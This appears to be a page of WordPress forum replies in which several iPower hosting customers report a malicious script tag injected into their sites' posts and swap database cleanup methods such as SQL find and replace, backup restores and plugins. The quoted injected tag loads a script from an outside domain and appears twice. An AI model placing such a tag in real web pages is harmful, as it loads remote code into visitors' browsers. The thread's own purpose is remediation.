Viewing 15 replies - 31 through 45 (of 79 total)
  • Just noticed this on a client wp site hosted with iPower. The script is at the bottom of every page and post. Guessing iPower may have an internal leek, someone with access to shared hosting db’s.

    ANYWAY.. quick fix.. export the db in phpMyAdmin, open the generated .sql file in an app like Dreamweaver and do a mass find/replace on the sql. Save the cleaned .sql file. Dropped all the db tables for the site. Then ‘Import’ the cleaned .sql file. Dreamweaver found and replaced 366 instances of the script.

    It may be safer to use a script like serialized search and replace like here: https://spectacu.la/search-and-replace-for-wordpress-databases/ But since I didn’t find the script in any serialized arrays this may be overkill.

    Hope this helps someone else.

    I did the export, cleaned out all the mal-ware and then tried to import the file and get this error. Any suggestions?

    SQL query:
    
    ?-- phpMyAdmin SQL Dump
    -- version 2.8.0.1
    -- https://www.phpmyadmin.net
    --
    -- Host: custsql-ipw01.eigbox.net
    -- Generation Time: May 17, 2011 at 06:38 PM
    -- Server version: 5.0.91
    -- PHP Version: 4.4.9
    --
    -- Database: <code>wrd_44a5fklcok</code>
    --
    CREATE DATABASE <code>wrd_44a5fklcok</code> DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci;
    
    MySQL said: Documentation
    #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '???CREATE DATABASE <code>wrd_44a5fklcok</code> DEFAULT CHARACTER SET latin1 COLLATE latin1_' at line 1

    hey david, what program did you use? are you on windows? looks like the program added its own line breaks or something special! :p try it again with the original sql.. If you’re on windows try crimson editor, if you’re on mac try bbedit or textmate

    I’m on Windows and used dreamweaver. I’ll give crimson a try. Thanks.

    Hmmm….I downloaded Crimson and did the replace function and also did it with notepad and got the same result.

    When I exported my database, I did it as a zipped file. Hope that’s not what caused the issue.

    Anything else you think it might be?

    Try your export from phpMyAdmin with no compression.. just the raw .sql of your database. Though, the compressed / zip download just has the same .sql file within the zip you downloaded. If that doesn’t work I would also try just importing the originally exported sql, without cleaning it, to see if that works, just to make sure your export isn’t what’s creating those symbols.

    You may also want to try downloading searchreplacedb.php from here and following the instructions. This will find and replace directly on the site, within the db and with sql queries.. no exporting or anything. But I would save a backup first ~ if the backup is ok to begin with :\

    Hope that helps..

    I had the same problem and it was a pain to do. Ipower support was no help so I had to figure it out on my own. I tried to use MyPHPadmin to export, delete the <script src="https://infoitpoweringgathering.com/ll.php?kk=11"></script> from the .sql file and import it, but it failed miserably (Got error “#1064 – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near…”). Then I tried to input the commands in the queue, but that failed. That was when I tried to contact ipower support, but no avil. However after hours of messing around…

    This is how I fixed it…

    I found out ipower has been doing incremental backups of the database so it was:

    -Control Panel -> MySQL Database
    -Select the database
    -Manage Backups tab
    -Download the one that says “All Tables”
    (If there is no download, do check status at the bottom and wait, it’ll show up..may have to click it a few times every few minutes)
    -Extract the file and there will be a .dmp file
    -Open it in a text editor (I used WordPad) Find and Replace “<script src=\"https://infoitpoweringgathering.com/ll.php?kk=11\"></script>” with a blank
    -Save the file (not save as)
    -Go back to Control Panel -> MySQL Database -> Manage Database (Not Manage Backup)
    -Go into Access phpMyAdmin of the particular database you downloaded
    -Import
    -Browse to the .dmp file that you edited
    -Press Go
    -Wait until finished
    -Should be good now

    TrendMicro popped up on my girlfriend’s laptop when she accessed my site and when I did the above, it stopped coming up.

    Wow…your solution seemed much easier. I actually exported and had to add the database tables as a query to get them back in there. Ipower has been worthless stating that there were no other complaints about their database servers being hacked.

    I have the same problem on all of my sites (but not one of my subdomains, oddly). I’m afraid to contact iPower support for fear they’ll wipe away 5 years worth of work.
    When I did a find and replace on the sql file, it found 2683 instances of that script. Yes, 2683 instances. Thank god I don’t post that often. ?? And that’s just one of my wordpress blogs.

    But the real problem comes in the importing because my sql file is 11385kb and mysqladmin only allows importing of file sizes up to 10,240kb. Do I just lose a huge chunk of data? And if I do, what gets lopped off? Old stuff? New stuff? Parts of anything and everything? I’m worried. Any advice other than getting off of ipower?

    I downloaded a program called mysqldumper. You can upload your .sql file to your server and then restore it through that program. However, you can also contact Ipower and have them restore the uploaded file as well. Whichever works for you.

    Okay, not so worried anymore. Used a WordPress plugin called Search & Replace (version 2.6.1).

    Did the job super fast even though it would always say that it never found anything when it searched. Just make sure any caching plugin is deactivated or you’ll never see the change.

    My big worry now is that even though I’ve done this once today, what’s to stop the idiots from doing it again, especially since iPower doesn’t seem to believe it’s their problem?

    Thread Starter jasonc2

    (@jasonc2)

    quadrain……thanks for the info. I am trying to use your method but when I click on the manage backups tab i get this…..

    To learn how to schedule a database backup, click here.

    Available Database Backups for forgedncwordpress
    forgedncwordpress Wed 2:21 Size: 7.8M
    Individual tables:
    wp_calendar_categories
    calendar
    calendar_categories
    calendar_config
    wp_calendar
    wp_calendar_config
    wp_commentmeta
    wp_comments
    wp_links
    wp_options
    wp_postmeta
    wp_posts
    wp_term_relationships
    wp_term_taxonomy
    wp_terms
    wp_usermeta
    wp_users

    forgedncwordpress Tue 2:21 Size: 7.8M
    Individual tables:
    wp_calendar_categories
    calendar
    calendar_categories
    calendar_config
    wp_calendar
    wp_calendar_config
    wp_commentmeta
    wp_comments
    wp_links
    wp_options
    wp_postmeta
    wp_posts
    wp_term_relationships
    wp_term_taxonomy
    wp_terms
    wp_usermeta
    wp_users

    * The size note above reflects the size of the database with all of its files. Please note: when you download your database, the size will be different because it will include the backup of mysql commands

    I do not see anything that will let me download “All tables” unless I select them individually? Ideas?

    jasonc2:
    The step where you can select which table to select, uncheck all, then click “Select Tables”.

    If it still doesn’t work…

    Do a search query in the phpmyadmin for the script and just download that table. From what I’ve seen, it’s only affecting wp_post. Kinda mundane since you have to do it for each table that has been affected.

    dmk_238 had a good method since it’s only affecting the posts too. I haven’t tried it.

    I am also an iPower customer and my WordPress blog was hacked as well. I ran the “Search and Replace” plugin and removed the script from the database. So far it looks like it worked.

    Anyone have any luck finding the source of the attack? I’m in the process of removing it, but still concerned it can make a comeback since it seems to be reasonably well spread across ipower.

Viewing 15 replies - 31 through 45 (of 79 total)
  • The topic ‘I did the updrage to the latest version now I have some strange code.’ is closed to new replies.